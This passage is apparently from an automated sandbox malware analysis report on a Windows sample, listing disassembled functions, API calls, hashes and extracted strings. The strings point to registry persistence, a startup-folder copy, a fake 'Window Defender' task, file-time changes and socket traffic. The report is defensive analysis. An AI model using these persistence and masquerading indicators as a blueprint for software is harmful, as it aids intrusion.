                                • _memset.LIBCMT ref: 026D4BBB
                                • GetProcAddress.KERNEL32(00000000,?), ref: 026D4BCC
                                • _memset.LIBCMT ref: 026D4BF8
                                • RegOpenKeyExA.ADVAPI32(80000001,1001A800,?,000F003F,?), ref: 026D4C4C
                                • RegSetValueExA.ADVAPI32(?,1001A830,?,00000001,?,?,?,000F003F,?), ref: 026D4C7E
                                • RegCloseKey.ADVAPI32(?,?,00000001,?,?,?,000F003F,?), ref: 026D4C8A
                                • Sleep.KERNEL32(000003E8,?,000F003F,?), ref: 026D4CA0
                                  • Part of subcall function 026D1034: CoInitialize.OLE32(00000000), ref: 026D1054
                                  • Part of subcall function 026D1034: lstrlen.KERNEL32 ref: 026D10AF
                                  • Part of subcall function 026D1034: _memset.LIBCMT ref: 026D10E4
                                  • Part of subcall function 026D1034: MultiByteToWideChar.KERNEL32(00000000,00000001,?,000000FF,?,00000104), ref: 026D1103
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$Sleep$AddressByteCharCloseFindInitializeLibraryLoadMultiOpenProcValueWideWindowlstrlen
                                • String ID: A$Open$Shel$Shel$cute$dll$l32.$lExe
                                • API String ID: 3213084081-3353880535
                                • Opcode ID: fbf2c02c3c685b6245098ad98db27a62da4b0181737a1a95a06ed5963551e0e8
                                • Instruction ID: 3dc03ace5b8a70472f516bb9cfa0c18c89416ef38314e4f32798ffbfec55964e
                                • Opcode Fuzzy Hash: fbf2c02c3c685b6245098ad98db27a62da4b0181737a1a95a06ed5963551e0e8
                                • Instruction Fuzzy Hash: E55164B194434AAFD321DB50CC89FEF7BEDEB84344F008829F649C6151DB749A498BA2
                                Function 026D14BA Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 124registryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$_sprintf$DefineDeviceFileMoveValue
                                • String ID: %s\1.qwq1$.qwq$1$[:\S$tart$up\1
                                • API String ID: 3652080668-2429600194
                                • Opcode ID: 32d6a7b4ec41b0dd8ea97b4cfa1b1785c512810dff918e44ec115429c83fd313
                                • Instruction ID: fba6103b4a595d990e69c49b68c200eb962a08b18023fe494b0c636c4f0c793a
                                • Opcode Fuzzy Hash: 32d6a7b4ec41b0dd8ea97b4cfa1b1785c512810dff918e44ec115429c83fd313
                                • Instruction Fuzzy Hash: 0E417DB1D0112DABDB21EBA49C48FEA77BEAF09300F1045E5D64DE3111DA748B88CF65
                                Function 0053E3E7 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 191windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0053B5F7: GetWindowLongW.USER32(?,000000F0), ref: 0053B602
                                • GetParent.USER32(?), ref: 0053E421
                                • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 0053E442
                                • GetWindowRect.USER32(?,?), ref: 0053E461
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0053E493
                                • MonitorFromWindow.USER32(00000000,00000001), ref: 0053E4C7
                                • GetMonitorInfoW.USER32(00000000), ref: 0053E4CE
                                • CopyRect.USER32(?,?), ref: 0053E4E2
                                • CopyRect.USER32(?,?), ref: 0053E4EC
                                • GetWindowRect.USER32(00000000,?), ref: 0053E4F5
                                • MonitorFromWindow.USER32(00000000,00000002), ref: 0053E502
                                • GetMonitorInfoW.USER32(00000000), ref: 0053E509
                                • CopyRect.USER32(?,?), ref: 0053E517
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
                                • String ID: (
                                • API String ID: 783970248-3887548279
                                • Opcode ID: 276ea092bf93a70f3c38623cfd06847fa14e4bab135780feb1e05cc8ec6b7688
                                • Instruction ID: dd166eb13ffc59d9dcdc0091d5b1a3894dccb50b4e947ab55323b646ce479f65
                                • Opcode Fuzzy Hash: 276ea092bf93a70f3c38623cfd06847fa14e4bab135780feb1e05cc8ec6b7688
                                • Instruction Fuzzy Hash: 37611E71900229AFCF10DFA8DD89AEEBBB9FF48714F155216E515F7290DB70A900CBA0
                                Function 026D2FE1 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 131registryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Close_memset_strncpy
                                • String ID: A$A$ADVAPI32.dll$Key$RegC$RegE$RegO$eyEx$eyEx$lose$numK$penK
                                • API String ID: 398226110-1513123901
                                • Opcode ID: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                • Instruction ID: 44eef1724e432c9050887a300d01eb720e5c386c089b1f499ccd0401a4493447
                                • Opcode Fuzzy Hash: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                • Instruction Fuzzy Hash: B051D4B1D0022DAFDB61DF95CC84AEEBBB8FB48304F1000A9E509A6250DB749E94CF61
                                Function 10002FDD Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 131registryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Close_memset_strncpy
                                • String ID: A$A$ADVAPI32.dll$Key$RegC$RegE$RegO$eyEx$eyEx$lose$numK$penK
                                • API String ID: 398226110-1513123901
                                • Opcode ID: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                • Instruction ID: 6570460de5860f22f59f610b6db523a60cae84646223255b99467aaef9325b81
                                • Opcode Fuzzy Hash: 14c49d87dcb23ba67ab38490d4ca0ee4809e63341d0e42fa1f4e677d95d510e9
                                • Instruction Fuzzy Hash: EE51C6B590122CAFDB61DF95CC85AEEBBB8FF48344F1040A9E509A7211D7749E84CF61
                                Function 026D92C1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252filetimeCOMMON
                                Download Yara Rule
                                APIs
                                • __fassign.LIBCMT ref: 026D93B8
                                • _memset.LIBCMT ref: 026D93EC
                                • _memset.LIBCMT ref: 026D9410
                                • _strcat_s.LIBCMT ref: 026D942B
                                • _sprintf.LIBCMT ref: 026D94AC
                                • _sprintf.LIBCMT ref: 026D94D4
                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 026D950A
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 026D9593
                                • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 026D95DF
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 026D95EB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                • String ID: %s%s$:$\$text.e
                                • API String ID: 3001508280-2720340845
                                • Opcode ID: 01a61206051ec77cbdfa5d34e4a78fc33b4c029da38912455276437bd67be555
                                • Instruction ID: 390814ff696eb62e1453e0bf032d59a430b52f2017eb4baba30186b960e0c9b6
                                • Opcode Fuzzy Hash: 01a61206051ec77cbdfa5d34e4a78fc33b4c029da38912455276437bd67be555
                                • Instruction Fuzzy Hash: 1391C371D0162CAFDB35DB54CC84BEAB779AF09318F0001EAE519A7290D7709AC9CF94
                                Function 026D238C Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 398COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_GS.LIBCMT ref: 026D2396
                                • VariantInit.OLEAUT32(?), ref: 026D23D8
                                • VariantInit.OLEAUT32(?), ref: 026D23F8
                                • VariantInit.OLEAUT32(?), ref: 026D2415
                                • VariantInit.OLEAUT32(?), ref: 026D2432
                                  • Part of subcall function 026D16CE: __EH_prolog3.LIBCMT ref: 026D16D5
                                  • Part of subcall function 026D16CE: SysAllocString.OLEAUT32(?), ref: 026D16FD
                                • _memset.LIBCMT ref: 026D26A2
                                • _memset.LIBCMT ref: 026D26D5
                                • _mbstowcs.LIBCMT ref: 026D26ED
                                • VariantInit.OLEAUT32(?), ref: 026D27B2
                                • VariantInit.OLEAUT32(?), ref: 026D27CF
                                  • Part of subcall function 026D172E: InterlockedDecrement.KERNEL32(?), ref: 026D1739
                                  • Part of subcall function 026D172E: SysFreeString.OLEAUT32(00000000), ref: 026D174E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: InitVariant$String_memset$AllocDecrementFreeH_prolog3H_prolog3_Interlocked_mbstowcs
                                • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                • API String ID: 2704202341-2587304410
                                • Opcode ID: 557f648541058eaadd70f0d75f0d9b987256742d9fcfc992963deb5166b5f77c
                                • Instruction ID: 5784d338559e2704d753c8e76642b7e1ae006966eb062cfe51f6beaba71f22ae
                                • Opcode Fuzzy Hash: 557f648541058eaadd70f0d75f0d9b987256742d9fcfc992963deb5166b5f77c
                                • Instruction Fuzzy Hash: 10F1F97190062DAFDB22DF64CD84A9EB7BEAF45304F1045D9E909AB250C771AF86CF50
                                Function 10002388 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 398COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_GS.LIBCMT ref: 10002392
                                • VariantInit.OLEAUT32(?), ref: 100023D4
                                • VariantInit.OLEAUT32(?), ref: 100023F4
                                • VariantInit.OLEAUT32(?), ref: 10002411
                                • VariantInit.OLEAUT32(?), ref: 1000242E
                                  • Part of subcall function 100016CA: __EH_prolog3.LIBCMT ref: 100016D1
                                  • Part of subcall function 100016CA: SysAllocString.OLEAUT32(?), ref: 100016F9
                                • _memset.LIBCMT ref: 1000269E
                                • _memset.LIBCMT ref: 100026D1
                                • _mbstowcs.LIBCMT ref: 100026E9
                                • VariantInit.OLEAUT32(?), ref: 100027AE
                                • VariantInit.OLEAUT32(?), ref: 100027CB
                                  • Part of subcall function 1000172A: InterlockedDecrement.KERNEL32(?), ref: 10001735
                                  • Part of subcall function 1000172A: SysFreeString.OLEAUT32(00000000), ref: 1000174A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: InitVariant$String_memset$AllocDecrementFreeH_prolog3H_prolog3_Interlocked_mbstowcs
                                • String ID: Window Defender UqdataMicrosoft Corporation$atio$n
                                • API String ID: 2704202341-2587304410
                                • Opcode ID: 85bb1b6dba8845eb6832dcc241e22674bc42bc2413ebe57639f70d2a06e4931d
                                • Instruction ID: c4f995021f6d453e0b67c1534942b25dbd89ffe59a045e9db0a1cde3e0b7ba2d
                                • Opcode Fuzzy Hash: 85bb1b6dba8845eb6832dcc241e22674bc42bc2413ebe57639f70d2a06e4931d
                                • Instruction Fuzzy Hash: 0AF10872900629AFDB12DF64CC84A9EB7BDEF45304F0085D5E909AB254D771AF8ACF90
                                Function 026D2D10 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 026D2D4F
                                • _memset.LIBCMT ref: 026D2D78
                                • Sleep.KERNEL32(00000001), ref: 026D2D98
                                • _malloc.LIBCMT ref: 026D2DD2
                                • _memset.LIBCMT ref: 026D2DFF
                                • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 026D2E17
                                • _free.LIBCMT ref: 026D2E1E
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 026D2E46
                                • FlushFileBuffers.KERNEL32(?), ref: 026D2E52
                                • CloseHandle.KERNEL32(?), ref: 026D2E5E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                • String ID: cef.dll$lib
                                • API String ID: 1923221151-1944707463
                                • Opcode ID: 3b7f21238bacadc657d5a8a56433dd2a6ff2117a5362b6b3c84e5166f2e26b1f
                                • Instruction ID: 02766eb3e02163f561552a85cb1e1c1e156f8d76e40bc0bedb3591f4dee1f72f
                                • Opcode Fuzzy Hash: 3b7f21238bacadc657d5a8a56433dd2a6ff2117a5362b6b3c84e5166f2e26b1f
                                • Instruction Fuzzy Hash: 2231A071D0022CAFDB259F648C84BEAB77AEB19304F0040D9E688A6250DBB19FC58F50
                                Function 00417770 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 196COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free
                                • String ID: Rsp Parse Error!$code$code Error!$msg$qrcode$qrcode Error!$response$response Error!
                                • API String ID: 269201875-2838377452
                                • Opcode ID: 599f3664890dfd251fabf13ef7453cbb470f910d76f5606c6711dc7cc21d23be
                                • Instruction ID: f80102e89131b556915b3c174a44694c652c3bbf314bd721eea245ddd39d9479
                                • Opcode Fuzzy Hash: 599f3664890dfd251fabf13ef7453cbb470f910d76f5606c6711dc7cc21d23be
                                • Instruction Fuzzy Hash: EA7101B1D043088BCB10EFA0C881ADEB7B5EF44714F15456EE9157B382DB38AD85CB99
                                Function 026D28BD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 312fileCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 026D290C
                                • _memset.LIBCMT ref: 026D291E
                                • _memset.LIBCMT ref: 026D292D
                                • _memset.LIBCMT ref: 026D2B1E
                                • _memset.LIBCMT ref: 026D2C3B
                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 026D2CA4
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 026D2CC7
                                • FlushFileBuffers.KERNEL32(00000000), ref: 026D2CCE
                                • CloseHandle.KERNEL32(00000000), ref: 026D2CD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                • String ID: <
                                • API String ID: 2144675991-4251816714
                                • Opcode ID: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                • Instruction ID: 67b007528c3be9b3d751eebec56e3525e01a78c68ca7ace9405a244bb56a053c
                                • Opcode Fuzzy Hash: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                • Instruction Fuzzy Hash: D5C1EC76C0012CAFDB219F648C849EABBFDEB09354F04C5EAF509A2250DB719F868F54
                                Function 004179E0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 212COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free
                                • String ID: 0}B$Msg$Obj$RES$[Notice]MSG Error!$[Notice]RES Error!$[Notice]Rsp Parse Error!
                                • API String ID: 269201875-1782929323
                                • Opcode ID: 1e68510126bfa72bc46471a3d57d4b5b77bf72f55be6068ffa668a56fbcc5238
                                • Instruction ID: e1dc275b282ce019acf22a76f68e19061cb2a77fd65f973232ce16d4ef2f8df8
                                • Opcode Fuzzy Hash: 1e68510126bfa72bc46471a3d57d4b5b77bf72f55be6068ffa668a56fbcc5238
                                • Instruction Fuzzy Hash: D581807150C3409BD320DF24C881B9BB7F5BF84744F40892EF59957292DB78A948CB97
                                Function 0054DA33 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 96memoryCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog3_catch.LIBCMT ref: 0054DA3A
                                • EnterCriticalSection.KERNEL32(?,00000010,0054DCDB,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?), ref: 0054DA4B
                                • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?,0067F1C8,000000FF), ref: 0054DA69
                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054DA9D
                                • LeaveCriticalSection.KERNEL32(00406FA0,?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?,0067F1C8), ref: 0054DB09
                                • _memset.LIBCMT ref: 0054DB28
                                • TlsSetValue.KERNEL32(?,00000000,3F7259E2), ref: 0054DB39
                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,00544579,005381E4,005382F8,0040E0F1,?,?,?,?,?,0067F1C8,000000FF), ref: 0054DB5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                • String ID: Yr?
                                • API String ID: 1891723912-3814531584
                                • Opcode ID: ee4e0fa6d0bc6837883920f8cdcf8fb05867f79d7c93fcca47aca23e43471762
                                • Instruction ID: a3a7765b4c26124d50065a281d03f13c18ddca9ed2149b58fcdfd7fe28945801
                                • Opcode Fuzzy Hash: ee4e0fa6d0bc6837883920f8cdcf8fb05867f79d7c93fcca47aca23e43471762
                                • Instruction Fuzzy Hash: 94316D71500606EFCB24AF60D889DAABFB6FF44318B21C62DF55697650DB30AE50CFA0
                                Function 00411740 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 366COMMON
                                Download Yara Rule
                                APIs
                                • GetCommandLineW.KERNEL32(000000FF,ExecuteGame,3F7259E2,?,759113C0,?,000000FF,?,00410E3F,?,?,006FD638), ref: 0041179D
                                • CommandLineToArgvW.SHELL32(00000000,?,759113C0,?,000000FF,?,00410E3F,?,?,006FD638), ref: 004117A4
                                • _memcpy_s.LIBCMT ref: 00411977
                                • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000005), ref: 004119D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: CommandLine$ArgvExecuteShell_memcpy_s
                                • String ID: --feihuo$ExecuteGame$ExecuteGame:error,$open$yun_game_id
                                • API String ID: 3847668404-1005890697
                                • Opcode ID: 7bed15792b36077b9b6f609ce8d74b94429a9e187beef292469044a8a60118a1
                                • Instruction ID: 2af083e08b68adfb570592fc054282c18a9c1ca409c7def1e871dbcade9d5dca
                                • Opcode Fuzzy Hash: 7bed15792b36077b9b6f609ce8d74b94429a9e187beef292469044a8a60118a1
                                • Instruction Fuzzy Hash: ABD1E0716006019FD704DB6CCC91EAAB3B5FF85334B28C76DE1259B2E1DB35AA06CB94
                                Function 004181D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 118networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00428A50: __strftime_l.LIBCMT ref: 00428A94
                                  • Part of subcall function 00428A50: OutputDebugStringA.KERNEL32(?,?,?,?,?,3F7259E2), ref: 00428AA3
                                  • Part of subcall function 00428A50: GetACP.KERNEL32(?,?,?,?,3F7259E2), ref: 00428AA9
                                • recv.WS2_32(?,?,00000001,00000002), ref: 00418216
                                • WSAGetLastError.WS2_32(?,00414D98), ref: 00418222
                                • send.WS2_32(?,00000000,00000002,00000000), ref: 0041826C
                                • WSAGetLastError.WS2_32(?,00414D98), ref: 0041827B
                                • WSAGetLastError.WS2_32 ref: 004182BB
                                • WSAGetLastError.WS2_32 ref: 004182CF
                                  • Part of subcall function 004289F0: __strftime_l.LIBCMT ref: 00428A1C
                                  • Part of subcall function 004289F0: OutputDebugStringW.KERNEL32(?), ref: 00428A2B
                                Strings
                                • Send socket data failed(err=%d)., xrefs: 0041827E
                                • Send socket data%s, xrefs: 004181FA
                                • The socket has been disconnected!, xrefs: 00418234
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: ErrorLast$DebugOutputString__strftime_l$recvsend
                                • String ID: Send socket data failed(err=%d).$Send socket data%s$The socket has been disconnected!
                                • API String ID: 2413326941-4143001793
                                • Opcode ID: 9e480a8153547b500284dcd37306fd1203a01cdc4f3995d9c1fe795f3f1c1a7d
                                • Instruction ID: c7dcb8c0283466b73eaf7007b09b45fe9c35480a9c746bb810a263ba5ba8cc97
                                • Opcode Fuzzy Hash: 9e480a8153547b500284dcd37306fd1203a01cdc4f3995d9c1fe795f3f1c1a7d
                                • Instruction Fuzzy Hash: 1C3113B1A40205AFD714DB68DC06BAE77A9EF85720F14426EF815E73D1EF7899008BA4
                                Function 00422E40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateFontFamilyFromName.GDIPLUS(Arial,00000000,?,?), ref: 00422E5B
                                • GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422E8B
                                • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422EAA
                                • GdipCreateFont.GDIPLUS(00000000,00000000,00000000,00000003,00000000), ref: 00422ECC
                                • GdipGetGenericFontFamilySansSerif.GDIPLUS(0073EDC0), ref: 00422EEE
                                • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422F0D
                                • GdipCreateFont.GDIPLUS(?,00000000,00000000,00000003,00000000), ref: 00422F29
                                • GdipDeleteFontFamily.GDIPLUS(00000000), ref: 00422F32
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
